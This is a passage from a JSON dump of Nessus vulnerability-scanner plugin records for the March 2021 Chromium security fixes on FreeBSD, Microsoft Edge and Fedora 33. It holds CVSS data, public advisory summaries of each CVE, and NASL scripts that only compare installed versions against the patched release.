1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147152);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chrome Releases reports :\n\nThis release includes 47 security fixes, including the below. Google\nis aware of reports that an exploit for CVE-2021-21166 exists in the\nwild. Please see URL for details.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n # https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2b92bef2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<89.0.4389.72\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:45:48", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.45. It is, therefore, affected by multiple vulnerabilities as referenced in the March 4, 2021 advisory.\n\n - A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2020-27844)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 89.0.774.45 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "href": "https://www.tenable.com/plugins/nessus/147192", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147192);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 89.0.774.45 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.45. It is, therefore, affected\nby multiple vulnerabilities as referenced in the March 4, 2021 advisory.\n\n - A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an\n attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds\n write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system\n availability. (CVE-2020-27844)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-4-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2e30009\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-27844\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21161\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21162\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21163\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21166\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21168\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21170\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21171\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21172\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21173\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21175\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21176\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21177\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21178\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21180\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21182\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21184\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21185\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21187\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21188\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21190\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 89.0.774.45 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '89.0.774.45' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:47:09", "description": "The remote Fedora 33 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2021-4740239e28 advisory.\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-19T00:00:00", "type": "nessus", "title": "Fedora 33 : chromium (2021-4740239e28)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-01-18T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2021-4740239E28.NASL", "href": "https://www.tenable.com/plugins/nessus/148782", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-4740239e28\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148782);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"FEDORA\", value:\"2021-4740239e28\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Fedora 33 : chromium (2021-4740239e28)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 33 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-4740239e28 advisory.\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate 